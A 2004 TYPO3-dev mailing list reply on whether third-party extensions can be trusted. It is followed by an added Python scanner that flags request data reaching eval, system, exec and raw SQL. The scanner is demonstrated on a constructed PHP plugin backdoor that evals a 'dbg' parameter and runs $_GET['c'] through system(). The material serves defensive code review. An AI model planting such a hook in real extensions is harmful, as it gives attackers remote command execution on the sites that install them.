[Typo3-dev] defined vars
Martin Seebach
typo3lists at g-bach.dk
Wed Oct 20 20:28:43 CEST 2004
Hi,
Daniel Gercke wrote:
> I think this is a security hole (typo3 v. 3.6.2).
> If i think about it, i could write an extension which is used by many
> people, and it can mail me some database accounts.
Password or no password, you could still put some code in your extension
that checks for a given GET variable, and executes that as SQL or a
shell command or PHP code. All of which is really bad - and much more
evil, because a default setup of MySQL will not accept incoming
connections over the network.
What is true for all software, is also true for TYPO3 extensions: When a
program is installed and executed, you have to trust the developer to
behave - or spend some time reading sourcecode. Which is much easier
with opensource, as Wolfgang Klinger also points out.
Venlig hilsen
Martin Seebach
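As an added illustration of the pattern Martin describes (a plugin that waits for a particular GET variable and hands it to eval, a shell or the database) and of the "read the source" countermeasure, here is a small Python scanner that flags request-derived data reaching such sinks. It is not part of the original thread and not TYPO3 code; the two PHP samples it scans are constructed for this example, and the list of sources and sinks (the PHP superglobals, the TYPO3 3.x `t3lib_div::_GP()`/`_GET()`/`_POST()` helpers, and `sql_query()` as the raw-SQL sink) is my assumption about what a reviewer should look for.

```python
import re

# Request-derived sources (assumption: PHP superglobals plus the TYPO3 3.x
# t3lib_div::_GP/_GET/_POST helpers that wrap them).
SOURCE_RE = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)\b|t3lib_div::_(?:GP|GET|POST)\s*\(")

# Sinks a hidden remote-control hook would use: PHP code execution, shell
# commands, and raw SQL (sql_query on TYPO3's $GLOBALS['TYPO3_DB']).
SINK_RE = re.compile(
    r"\b(eval|assert|system|exec|shell_exec|passthru|popen|proc_open"
    r"|create_function|mysql_query|sql_query)\s*\("
)

ASSIGN_RE = re.compile(r"^\s*\$(\w+)\s*=(?!=)")   # simple "$var = ..." statements
VAR_RE = re.compile(r"\$(\w+)")                   # any variable reference


def scan_php(src):
    """Return (line_no, sink_name, reason) for every sink that is fed,
    directly or through a plain assignment, by request data.

    Taint is propagated only through single-line '$var = ...' assignments,
    so this is a review aid that points a human at the right lines, not a
    full data-flow analysis."""
    tainted = set()
    findings = []
    for no, line in enumerate(src.splitlines(), 1):
        m = ASSIGN_RE.match(line)
        if m:
            rhs = line[m.end():]
            if SOURCE_RE.search(rhs) or any(v in tainted for v in VAR_RE.findall(rhs)):
                tainted.add(m.group(1))
        for s in SINK_RE.finditer(line):
            args = line[s.end():]
            if SOURCE_RE.search(args):
                findings.append((no, s.group(1), "request data passed directly"))
            else:
                used = [v for v in VAR_RE.findall(args) if v in tainted]
                if used:
                    findings.append((no, s.group(1), "tainted variable $" + used[0]))
    return findings


# Constructed sample: looks like an ordinary frontend plugin, but lines 5-7
# turn any request carrying ?dbg=... into remote PHP execution.
BACKDOORED_EXT = """<?php
// Constructed sample of a plugin with a hidden remote-control hook.
class tx_sample_pi1 {
    function main($content, $conf) {
        $cmd = t3lib_div::_GP('dbg');
        if ($cmd) {
            eval($cmd);
        }
        $sql = 'SELECT uid FROM pages WHERE uid=' . intval($_GET['id']);
        $res = $GLOBALS['TYPO3_DB']->sql_query($sql);
        system($_GET['c']);
        return $content;
    }
}
"""

# Constructed sample with the same shape but no dangerous sink.
CLEAN_EXT = """<?php
class tx_sample_pi1 {
    function main($content, $conf) {
        $id = intval($_GET['id']);
        $res = $GLOBALS['TYPO3_DB']->exec_SELECTquery('uid', 'pages', 'uid=' . $id);
        return $content . $id;
    }
}
"""

if __name__ == "__main__":
    for name, src in (("backdoored", BACKDOORED_EXT), ("clean", CLEAN_EXT)):
        print(name)
        for line_no, sink, reason in scan_php(src):
            print("  line %d: %s() <- %s" % (line_no, sink, reason))
```

On the backdoored sample the scanner reports `eval()` on line 7 (fed by `$cmd` from `_GP('dbg')`), `sql_query()` on line 10, and `system()` on line 11; on the clean sample it reports nothing. The `sql_query()` hit is the kind of finding a reviewer then clears by hand, since the value went through `intval()` first, which is exactly the point of the exercise: the tool narrows the source you have to read, it does not replace reading it.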